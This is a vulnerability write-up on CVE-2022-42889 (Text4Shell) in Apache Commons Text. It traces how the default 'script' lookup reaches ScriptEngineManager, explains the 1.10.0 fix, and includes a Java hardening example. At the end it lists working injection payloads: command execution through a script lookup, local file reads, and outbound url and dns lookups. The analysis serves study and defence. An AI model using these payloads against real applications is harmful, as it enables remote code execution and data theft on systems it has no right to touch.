CVE-2022-42889 Apache Commons Text RCE (Text4Shell)

source link: https://y4er.com/posts/cve-2022-42889-apache-commons-text-rce/

2022-10-13

https://twitter.com/Y4tacker/status/1580193254665920513?s=20&t=mq9URhmKSa7xADbSY4r2fw

I saw this tweet and took a look at it myself.

Version 1.9 registers a `script` lookup prefix by default.

https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/lookup/StringLookupFactory.html

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/1.png

org.apache.commons.text.lookup.InterpolatorStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/2.png

The key prefix `script` is split off from the variable name and dispatched to the matching lookup.

org.apache.commons.text.lookup.ScriptStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/3.png

It then calls ScriptEngineManager to evaluate the remainder of the expression as script code.

The 1.10.0 fix: when addDefaultStringLookups registers the default lookups, it no longer adds the `script`, `url` and `dns` prefixes.

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/4.png

org.apache.commons.text.lookup.StringLookupFactory.DefaultStringLookupsHolder#createDefaultStringLookups

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/5.png
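The following Java program is an added example, not code from the original post or from Commons Text itself. It assumes Commons Text 1.9 or 1.10.0 on the classpath; the hypothetical `dangerousDefaults()` reports whether the default interpolator on that classpath registers the `script`, `url` and `dns` lookups (present on 1.9, absent on 1.10.0 unless opted in), and the hypothetical `hardenedSubstitutor()` shows the mitigation that works on either version: build the interpolator from an explicit allowlist with `addDefaultLookups=false` and no fallback lookup, so an unregistered prefix such as `script` has no resolver and its `${...}` token is left in place rather than evaluated.

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.InterpolatorStringLookup;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

// Hypothetical class name; added example, not part of Commons Text.
public class Text4ShellHardening {

    // Runtime check of the library actually on the classpath: which of the
    // dangerous prefixes does the default interpolator register? The map
    // keys are stored lowercase, which is how addDefaultStringLookups adds them.
    static Map<String, Boolean> dangerousDefaults() {
        InterpolatorStringLookup defaults =
                (InterpolatorStringLookup) StringLookupFactory.INSTANCE.interpolatorStringLookup();
        Map<String, StringLookup> registered = defaults.getStringLookupMap();
        Map<String, Boolean> result = new HashMap<>();
        for (String key : new String[] {"script", "url", "dns"}) {
            result.put(key, registered.containsKey(key));
        }
        return result;
    }

    // Hardened substitutor: only an explicit allowlist of lookups, no defaults
    // (addDefaultLookups = false) and no fallback lookup (null). Any other
    // prefix, including script/url/dns, resolves to null and StringSubstitutor
    // leaves the ${...} token unchanged instead of evaluating it.
    static StringSubstitutor hardenedSubstitutor() {
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("date", StringLookupFactory.INSTANCE.dateStringLookup());
        allowed.put("base64Decoder", StringLookupFactory.INSTANCE.base64DecoderStringLookup());
        StringLookup interpolator =
                StringLookupFactory.INSTANCE.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(interpolator);
    }

    public static void main(String[] args) {
        System.out.println("dangerous lookups registered by default: " + dangerousDefaults());

        // Constructed probe: a harmless script expression mixed with an allowed lookup.
        // Only the base64Decoder part is substituted; the script token stays verbatim.
        String untrusted = "${base64Decoder:aGVsbG8=} / ${script:js:1+1}";
        System.out.println(hardenedSubstitutor().replace(untrusted));
    }
}
```

If a template must fail closed rather than pass unknown prefixes through, call `setEnableUndefinedVariableException(true)` on the substitutor so an unresolvable variable throws instead of being echoed back.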

Some payloads

${script:js:java.lang.Runtime.getRuntime().exec('calc')}
${file:utf8:e:/test.txt}
${url:utf8:http://baidu.com}
${url:utf8:file:///e:/test.txt}
${dns:address|baidu.com}
${xml:/tmp/aaa:/xpathexpression}

My writing is poor, my wording flippant, the content shallow and my hands-on work clumsy. Pointers and corrections from the masters are welcome; many thanks.
